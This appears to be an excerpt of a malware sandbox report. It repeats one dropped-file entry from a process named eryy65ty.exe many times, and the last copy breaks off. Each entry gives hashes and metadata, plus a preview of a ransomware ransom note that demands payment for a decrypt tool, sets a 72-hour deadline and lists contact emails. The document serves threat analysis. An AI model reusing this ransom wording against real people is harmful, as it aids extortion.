                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
